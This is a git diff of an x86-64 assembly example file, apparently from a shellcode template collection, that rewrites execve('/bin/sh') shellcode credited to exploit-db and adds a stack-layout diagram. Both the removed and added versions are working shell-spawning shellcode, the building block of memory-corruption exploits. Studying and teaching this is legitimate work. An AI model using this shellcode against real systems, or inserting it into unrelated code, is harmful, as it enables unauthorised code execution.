diff options
Diffstat (limited to 'templates/shellcode/examples/shell64.asm')
| -rw-r--r-- | templates/shellcode/examples/shell64.asm | 36 |
1 files changed, 22 insertions, 14 deletions
diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm index 2353b6f..3812c33 100644 --- a/templates/shellcode/examples/shell64.asm +++ b/templates/shellcode/examples/shell64.asm @@ -1,16 +1,24 @@ -[SECTION .text] -global _start +; Originally based on https://www.exploit-db.com/shellcodes/47008 -; https://www.exploit-db.com/shellcodes/47008 +; stack layout +; +; ┏━━━━━━━━━━━━━━┓ +; ┃ v +; [ argv0, NULL ] "/bin//sh" NULL +; ^ ^ ^ +; ┃ ┃ ┃ +; argv envp filename -_start: - xor rsi, rsi - xor rdx, rdx - push rsi - mov rdi, 0x68732f2f6e69622f - push rdi - push rsp - pop rdi - mov al, 0x3b - cdq - syscall +; execve("/bin/sh", ["/bin/sh"], []) +xor rax, rax +xor rsi, rsi +mov rdi, 0x68732f2f6e69622f +push rsi +push rdi +mov rdi, rsp +push rsi +mov rdx, rsp +push rdi +mov rsi, rsp +mov al, 59 +syscall |